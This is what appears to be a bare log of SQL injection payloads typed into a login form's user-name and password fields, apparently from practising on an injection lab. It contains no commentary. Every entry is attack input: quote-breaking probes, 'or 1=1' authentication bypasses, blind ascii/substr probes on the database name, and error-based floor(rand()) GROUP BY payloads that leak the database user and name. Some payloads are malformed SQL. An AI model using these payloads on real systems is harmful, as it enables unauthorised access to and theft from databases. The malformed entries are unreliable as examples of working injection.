User Name:admin
Password:1"
User Name:admin
Password:1'
User Name:admin
Password:1)--+
User Name:admin
Password:1')--+
User Name:admin
Password:1'
User Name:admin
Password:1) or 1=1;#
User Name:admin
Password:1') or 1=1;#
User Name:admin
Password:1') or 1=1;#
User Name:admin
Password:1') or ascii(substr((length(database())),1,1))>50;#
User Name:admin
Password:1') or ascii(substr((length(database())),1,1))>50;#
User Name:admin
Password:1') or ascii(substr((select database()),1,1))>100;#
User Name:admin
Password:1') and select concat(*) from information_schema.tables group by concat(database(),floor(rand(0)*2)) --+
User Name:admin
Password:1') and select concat(*) from information_schema.tables group by concat(database(),floor(rand(0)*2));#
User Name:admin
Password:1'
User Name:admin
Password:1"
User Name:admin
Password:1') union select count(*),concat_ws('-',(select user()),(select database()),floor(rand()*2)) as a from information_schema.tables group by a--+
User Name:1') union select count(*),concat_ws('-',(select user()),(select database()),floor(rand()*2)) as a from information_schema.tables group by a--+
Password:1") union select count(*),concat_ws('-',(select user()),(select database()),floor(rand()*2)) as a from information_schema.tables group by a--+
